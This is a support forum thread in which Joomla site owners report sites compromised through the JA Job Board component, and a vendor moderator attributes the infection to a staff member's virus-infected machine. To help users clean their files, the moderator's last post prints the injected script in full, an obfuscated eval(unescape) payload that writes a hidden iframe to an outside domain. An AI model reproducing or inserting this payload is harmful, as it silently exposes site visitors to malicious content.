JA Job Board Component 8,554 posts

[jtruelson Friend jtruelsonJoin date: March 2006Posts: 30Downloads:0Uploads:0 Thanks: 2 Thanked: 5 times in 1 posts]

#150322

Our development site was compromised. We have had to restore from a recent backup.
All index pages were appended with hex coded script. Support ticket has been submitted – no reply as of yet.

So far our efforts to isolate the cause have turned up the following:

from
http://www.securityfocus.com/bid/39384

The JA Job Board ‘com_jajobboard’ component for Joomla! is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

JA Job Board ‘com_jajobboard’ 1.4.4 is vulnerable; other versions may be affected.

[Anonymous Moderator JA DeveloperJoin date: September 2014Posts: 9914Downloads:207Uploads:152 Thanks: 1789 Thanked: 2008 times in 1700 posts]

#340174

Hello jtruelson,

We express sincere apology for all inconveniences and problems that you have faced. 🙁

In fact, a new developer was newly assigned to share the support workload for job board and while he access your source via your FTP, the virus has penetrated to those files from his infected machine. I would like to confirm that the download package and our dev server is free from virus.

His machine has been reinstalled now with anti virus protection. Please give us access to your FTP again via ticket ID# (DTD-726753) for correcting our mistake and fixing the related issues.

He handles two cases and the other has been contacted to check if he faces the same problem for soonest solution

[spdave Friend spdaveJoin date: August 2009Posts: 55Downloads:0Uploads:7 Thanks: 8]

#340320

Hello,

the Web site was hacked 2 times since the 1.4.4 updated ! Web site is now unavailable 😮 for me

[gavinallday Friend gavinalldayJoin date: October 2006Posts: 26Downloads:0Uploads:0 Thanks: 4]

#340330

Hi,

My site was also hacked on Friday whilst awaiting support from your team.

We have had to rebuild the site and work is still ongoing to restore it.

I haven’t been contacted regarding your employees virus, but the two might be connected.

Could you confirm that this is definitely due to a virus on the PC of one of your team, not a vulnerability in JobBoard itself?

Is there anything else I should do to protect against further attacks?

Thanks,

[siukin Friend siukinJoin date: March 2010Posts: 49Downloads:0Uploads:4 Thanks: 7]

#340357

Also hacked here on sunday. I submitted a ticket.

[Anonymous Moderator JA DeveloperJoin date: September 2014Posts: 9914Downloads:207Uploads:152 Thanks: 1789 Thanked: 2008 times in 1700 posts]

#340407

Hi all,

• We would like to confirm that this is definitely due to a virus on the PC of one of out team, JA Job board packages as well as all other download packages, our dev servers are protected by licensed anti-virus system and free from virus. This is the first case and the last ever happens. We hereby apologizes for all inconveniences that may have causes.
• There are many causes leading to security holes for hacked websites. The problem caused by auto generated scripts is just one of those.
• After infection, the system shall not work stably. However, if the auto inserted scripts are removed from infected files, the whole system shall work fine again
• SOLUTION:
– For those whose job site seems not working stably recently, kindly open source files for tracking down infected files without influencing running computer or the whole websites because the strange scripts are lines of Javascript not program file with *.exe
– Infected files (normally in index.php or index2.php and some of files from running template) shall be inserted with the below unwanted lines at the bottom. You can manually search and get it removed. The unwanted script is as follows

<blockquote><script>eval(unescape(‘%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%68%4F%58%2C%73%6A%63%75%2C%73%70%2C%49%41%76%42%2C%53%56%50%45%2C%74%77%68%29%7B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%73%70%29%7B%72%65%74%75%72%6E%20%73%70%2E%74%6F%53%74%72%69%6E%67%28%73%6A%63%75%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%73%70%2D%2D%29%74%77%68%5B%53%56%50%45%28%73%70%29%5D%3D%49%41%76%42%5B%73%70%5D%7C%7C%53%56%50%45%28%73%70%29%3B%49%41%76%42%3D%5B%66%75%6E%63%74%69%6F%6E%28%53%56%50%45%29%7B%72%65%74%75%72%6E%20%74%77%68%5B%53%56%50%45%5D%7D%5D%3B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%73%70%3D%31%7D%3B%77%68%69%6C%65%28%73%70%2D%2D%29%69%66%28%49%41%76%42%5B%73%70%5D%29%68%4F%58%3D%68%4F%58%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%53%56%50%45%28%73%70%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%49%41%76%42%5B%73%70%5D%29%3B%72%65%74%75%72%6E%20%68%4F%58%7D%28%27%38%2E%30%28%22%3C%64%20%63%3D%5C%5C%22%62%3A%2F%2F%61%2E%39%2F%5C%5C%22%20%37%3D%31%20%36%3D%31%20%35%3D%5C%5C%22%34%3A%33%3B%32%3A%65%5C%5C%22%3E%22%29%3B%27%2C%31%35%2C%31%35%2C%27%77%72%69%74%65%7C%7C%70%6F%73%69%74%69%6F%6E%7C%68%69%64%64%65%6E%7C%76%69%73%69%62%69%6C%69%74%79%7C%73%74%79%6C%65%7C%68%65%69%67%68%74%7C%77%69%64%74%68%7C%64%6F%63%75%6D%65%6E%74%7C%63%6F%6D%7C%61%76%65%72%73%62%6F%6E%6B%6F%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%61%62%73%6F%6C%75%74%65%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29’)); </script></blockquote>

[Author]

Posts